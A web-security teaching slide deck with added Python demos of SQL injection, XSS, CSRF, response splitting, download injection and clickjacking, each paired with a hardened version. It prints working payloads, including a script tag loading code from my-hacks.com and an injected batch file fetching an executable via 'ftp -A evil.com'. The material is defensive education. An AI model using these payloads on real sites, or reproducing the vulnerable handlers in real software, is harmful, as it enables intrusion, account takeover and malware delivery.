Trendy Web Security

A Review of times past


SQL Injection
password field:
' OR 1=1; --
Parses as:
SELECT username FROM users WHERE username =
'username' AND password = '' OR 1=1; --'
(AND binds tighter than OR, so every row matches;
the -- comments out the dangling quote)
And you're in...
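The bypass above, run for real against an in-memory SQLite table, as an added example that is not part of the slide deck. The table, the account alice/s3cret and the function names are constructed for the demo; the payload is the slide's.

```python
import sqlite3

# Constructed sample data (not from the slide): one account with a known password.
USERS = [("alice", "s3cret")]
# The slide's payload, typed into the password field.
PAYLOAD = "' OR 1=1; --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # The slide's query built by string concatenation: the input is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    # With the payload this becomes
    #   ... WHERE username = 'username' AND password = '' OR 1=1; --'
    # AND binds tighter than OR, so "OR 1=1" makes every row match, and
    # "--" comments out the dangling quote so the statement still parses.
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Parameterized query: the driver passes the values separately from the SQL
    # text, so quotes and comment markers in the input are just characters.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "username", PAYLOAD))  # ['alice']
    print("safe:      ", login_safe(db, "username", PAYLOAD))        # []
```

The vulnerable query returns a row without knowing any password; the parameterized one returns nothing for the payload and still works for the real credentials.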
Cross Site Scripting
(XSS)
About-Me field
I enjoy long walks on the beach, and
<script src="http://my-hacks.com/owned.js"></script>
Now you have your code
running in another user's
browser.
Have your code change the
DNS settings on his Linksys router?
SQL Injections and XSS
attacks are old news.
What's new(er)?
Click Jacking
A Demo...
No JS Needed!
Cross Site Request
Forgery
<img src="http://www.google.com/ig/logout?continue=http://www.google.com/ig%3Fhl%3Den">
You are now logged out
of Google.
Or... had your domain
stolen:
• A CSRF request creates a new Gmail filter which
forwards certain emails to the attacker
• The attacker asks your domain host for a transfer + unlock;
the host's emails back to you are caught by the filter
• The attacker transfers your domain away.
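A model of the logout endpoint behind the <img> trick, and the same endpoint hardened, as an added example that is not part of the slide deck. The Session class, handler signatures and return codes are constructed for the demo; the only thing taken from the slide is the idea that a GET with the victim's cookie does the job.

```python
import secrets


# Constructed model of a web-app session. The cookie is what the browser sends
# automatically with every request to the site, whoever caused the request.
class Session:
    def __init__(self):
        self.logged_in = True
        self.csrf_token = secrets.token_urlsafe(16)


def logout_vulnerable(method: str, params: dict, session: Session) -> int:
    # Any request carrying the session cookie logs the user out, GET included:
    # the slide's <img src=".../logout"> on an attacker's page is enough.
    session.logged_in = False
    return 302


def logout_hardened(method: str, params: dict, session: Session) -> int:
    # State changes only on POST ...
    if method != "POST":
        return 405
    # ... and only when the form carries the per-session token. An attacker's
    # page can auto-submit a cross-site POST form, but it cannot read the
    # token out of the victim's page, so the forged request fails here.
    sent = params.get("csrf_token", "")
    if not secrets.compare_digest(sent, session.csrf_token):
        return 403
    session.logged_in = False
    return 302


def forged_img_request(handler, session: Session) -> int:
    """The slide's <img> trick: the browser issues GET /logout with the cookie."""
    return handler("GET", {}, session)


def forged_post_request(handler, session: Session) -> int:
    """A hidden auto-submitting form on the attacker's page: POST, but no token."""
    return handler("POST", {"continue": "http://www.google.com/ig?hl=en"}, session)


def genuine_post_request(handler, session: Session) -> int:
    """The site's own logout form, which embeds the token."""
    return handler("POST", {"csrf_token": session.csrf_token}, session)


if __name__ == "__main__":
    s = Session()
    forged_img_request(logout_vulnerable, s)
    print("vulnerable, after <img>:", "logged in" if s.logged_in else "logged out")
    s = Session()
    forged_post_request(logout_hardened, s)
    print("hardened, after forged POST:", "logged in" if s.logged_in else "logged out")
```

The Gmail filter in the domain-theft story is the same mechanism with a different endpoint: a request that creates a filter, issued with the victim's cookie, from a page the victim merely visited.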
HTTP Response Splitting
Normal request:
/redir_lang.jsp?lang=English

Attack request (%0d%0a is CR LF, the header line terminator):
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
Raw response from the server (a browser, proxy or cache reads it as two responses):
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
Content-Type: text/html
Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/
Connection: Close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

&lt;html&gt;Shazam&lt;/html&gt;">http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

&lt;html&gt;Shazam&lt;/html&gt;</a>.</p>
</body></html>
Why?

• Cache Poisoning
• Replace content
• Phishing
• XSS
• etc.
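The split seen from the receiving end, as an added example that is not part of the slide deck or the whitepaper it draws on: a constructed stand-in for redir_lang.jsp builds the response, a minimal HTTP/1.1 reader parses the stream the way a naive client or cache would, and a whitelisted version of the endpoint refuses the payload. The payload is the slide's; the server model, the 302 body and the function names are assumptions.

```python
from urllib.parse import unquote

# The slide's attack value for the lang parameter, still URL-encoded.
PAYLOAD = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
           "Content-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a"
           "<html>Shazam</html>")


def decoded_payload() -> str:
    """The parameter as the server sees it after URL decoding: CR LF included."""
    return unquote(PAYLOAD)


def redir_lang(lang: str) -> bytes:
    """Constructed stand-in for redir_lang.jsp: lang goes into Location verbatim."""
    body = "<html><head><title>302 Moved Temporarily</title></head></html>"
    head = ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Date: Wed, 24 Dec 2003 15:26:41 GMT\r\n"
            "Location: http://10.1.1.1/by_lang.jsp?lang=%s\r\n"
            "Server: WebLogic XMLX Module 8.1 SP1\r\n"
            "Content-Type: text/html\r\n"
            "Content-Length: %d\r\n"
            "\r\n" % (lang, len(body)))
    return (head + body).encode("latin-1")


def redir_lang_hardened(lang: str) -> bytes:
    # Whitelist: a language name is letters only. Anything else, CR and LF
    # included, never reaches a header. (Newer servlet containers also refuse
    # CR/LF in header values; the whitelist does not depend on that.)
    if not lang.isalpha():
        raise ValueError("bad lang parameter")
    return redir_lang(lang)


def parse_messages(raw: bytes) -> list:
    """Read the stream as a naive HTTP/1.1 client or cache does: status line,
    headers, blank line, Content-Length bytes of body; repeat while the next
    bytes look like another status line. Returns [(status, headers, body)]."""
    messages, pos = [], 0
    while raw.startswith(b"HTTP/", pos):
        end = raw.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        lines = raw[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        length = int(headers.get("content-length", "0"))
        messages.append((lines[0], headers, raw[body_start:body_start + length]))
        pos = body_start + length
    return messages


if __name__ == "__main__":
    for status, _, body in parse_messages(redir_lang(decoded_payload())):
        print(status, body)
```

The injected "Content-Length: 0" closes the real 302 early; the bytes after it start with a status line, so the reader takes "200 OK / Shazam" as a second, complete response. A shared cache that has a second request in flight on the same connection files that response under the second request's URL, which is the cache-poisoning case in the list above.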
File Download Injection
A similar idea to
response splitting.
We've all written
download scripts:
download.php?file=report.xls
<?php
// The file name from the query string is copied into a response header
// unchanged. basename() strips directories, but it does not strip CR or LF.
$filename = basename($_GET["file"]);
header('Content-Disposition: attachment; filename="' . $filename . '"');
readfile($filename);
return;
http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Path=/download
Content-Disposition: attachment;filename=attack.bat
Content-length: 88

echo get /pub/winzip/wzinet95.exe|ftp -A evil.com
wzinet95.exe
Content-Length: 0
Content-Type: application/octet-stream;charset=euc-kr
The browser saves attack.bat from the trusted domain; its first line is the
attacker's ftp command, and the server's remaining headers are just trailing
text in the file.
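The download script modelled in Python, vulnerable and then hardened along the lines of the mitigation slide (real file name from the server side, not the HTTP argument), as an added example that is not part of the slide deck or the Aspect paper. The FILES table, the payload variant and the function names are constructed for the demo.

```python
import os
import re

# Constructed stand-in for the files download.php is meant to serve, keyed by
# the identifier the client may send. The real name and content live here, on
# the server side, not in the request.
FILES = {
    "report.xls": ("report.xls", b"\xd0\xcf\x11\xe0 fake spreadsheet bytes"),
}

# Constructed payload in the spirit of the slide's attack.bat URL, already
# URL-decoded: CR LF CR LF ends the headers, and what follows becomes the first
# lines of the downloaded batch file. Slashes are left out so that basename()
# cannot mask the effect.
PAYLOAD = ("attack.bat\r\n\r\n"
           "echo get wzinet95.exe|ftp -A evil.com\r\n"
           "wzinet95.exe")

# Whitelist for the identifier: one leading alphanumeric, then a short run of
# alphanumerics, dots, underscores or dashes. No CR, LF, slash, quote or space.
SAFE_ID = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def basename_keeps_crlf(name: str) -> bool:
    """basename() only cuts at the last path separator; CR and LF survive."""
    return "\r\n" in os.path.basename(name)


def download_vulnerable(file_param: str) -> bytes:
    # Mirrors the slide's PHP: basename() keeps CR and LF, and the result is
    # pasted into Content-Disposition unquoted.
    name = os.path.basename(file_param)
    head = ("HTTP/1.1 200 OK\r\n"
            "Content-Disposition: attachment;filename=%s\r\n"
            "Content-Type: application/octet-stream\r\n"
            "\r\n" % name)
    content = FILES.get(name, ("", b""))[1]
    return head.encode("latin-1") + content


def download_hardened(file_param: str) -> bytes:
    # 1. Whitelist the identifier before it touches anything.
    # 2. Look the file up server-side; the header carries the stored name,
    #    never the HTTP argument.
    # 3. Quote the filename (RFC 6266 quoted-string) so it is one token.
    if not SAFE_ID.match(file_param) or file_param not in FILES:
        return b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
    real_name, content = FILES[file_param]
    head = ("HTTP/1.1 200 OK\r\n"
            'Content-Disposition: attachment; filename="%s"\r\n'
            "Content-Type: application/octet-stream\r\n"
            "Content-Length: %d\r\n"
            "\r\n" % (real_name, len(content)))
    return head.encode("latin-1") + content


def served_body(response: bytes) -> bytes:
    """What the browser saves to disk: everything after the first blank line."""
    return response.split(b"\r\n\r\n", 1)[1]


if __name__ == "__main__":
    print(served_body(download_vulnerable(PAYLOAD)).decode("latin-1"))
    print(download_hardened(PAYLOAD).decode("latin-1"))
```

With the payload, the vulnerable script serves a file whose first line is the ftp command even though readfile() found nothing; the hardened one answers 404, and for a legitimate identifier the filename in the header comes from the table, not from the query string.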
It's a dangerous world...
How about some
Mitigation
As a user:
Sensitive stuff in a
separate browser?
As a programmer:
Whitelist everything.
Nothing gets through
w/o you knowing
As a programmer:
GET vs. POST. Use them correctly:
GET must never change state.
(POST alone does not stop CSRF; a hidden
form on the attacker's page submits as
silently as an <img> tag. Pair it with a
per-session token.)
Download Injection:
Use the real file name,
and not the HTTP argument.
ClickJacking
NoScript has a
"Forbid iframe" feature
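NoScript's "Forbid iframe" is a client-side fix; the server-side counterparts, the X-Frame-Options header and the CSP frame-ancestors directive, postdate this deck and are not mentioned on the slide. The following added example (not part of the slide deck) shows the attacker page the demo relies on and a small decision function that applies those two headers the way a browser does for the common cases; the bank.example and partner.example names and the function names are constructed.

```python
from urllib.parse import urlsplit

# Constructed attacker page: the victim site loads in an invisible iframe
# positioned so that the button the attacker wants clicked sits under the
# decoy text. The click lands in the frame; no JavaScript is involved.
ATTACK_PAGE = """<html><body>
<div style="position:absolute;top:100px;left:100px">Click here to win!</div>
<iframe src="https://bank.example/settings"
        style="position:absolute;top:60px;left:40px;width:600px;height:400px;
               opacity:0;z-index:2"></iframe>
</body></html>"""


def origin(url: str) -> str:
    parts = urlsplit(url)
    return "%s://%s" % (parts.scheme, parts.netloc)


def _source_matches(src: str, top: str, page: str) -> bool:
    """One frame-ancestors source expression against the framing page's origin."""
    s = src.lower()
    if s == "'none'":
        return False
    if s == "'self'":
        return top == page
    if s == "*":
        return True
    top_scheme, _, top_host = top.partition("://")
    scheme, _, host = s.partition("://") if "://" in s else ("", "", s)
    if scheme and scheme != top_scheme:
        return False
    if host.startswith("*."):
        return top_host.endswith(host[1:])   # "*.example.com" matches "a.example.com"
    return host == top_host


def may_be_framed(headers: dict, page_url: str, top_url: str) -> bool:
    """Should a browser render page_url inside a frame on top_url, given the
    response headers of page_url? Handles X-Frame-Options DENY / SAMEORIGIN and
    CSP frame-ancestors with 'none', 'self', exact origins and *.host sources."""
    h = {k.lower(): v for k, v in headers.items()}
    top, page = origin(top_url), origin(page_url)

    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            # frame-ancestors takes precedence over X-Frame-Options when both
            # are present; an empty source list means nobody may frame.
            return any(_source_matches(src, top, page) for src in parts[1:])

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return top == page
    return True   # no policy at all: framable by anyone, the clickjacking case


if __name__ == "__main__":
    print(may_be_framed({}, "https://bank.example/settings", "https://evil.example/"))
    print(may_be_framed({"X-Frame-Options": "DENY"},
                        "https://bank.example/settings", "https://evil.example/"))
```

Without either header, the settings page is framable from anywhere and the attack page above works; DENY or a frame-ancestors policy that excludes evil.example makes the browser refuse to render the frame, clicks included.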
Links
• http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss

• http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

• http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html

• http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html

• http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf

• http://www.breakingpointsystems.com/community/blog/clickjacking

• http://en.wikipedia.org/wiki/Cross-site_request_forgery

• http://www.davidairey.com/google-gmail-security-hijack/

• http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html
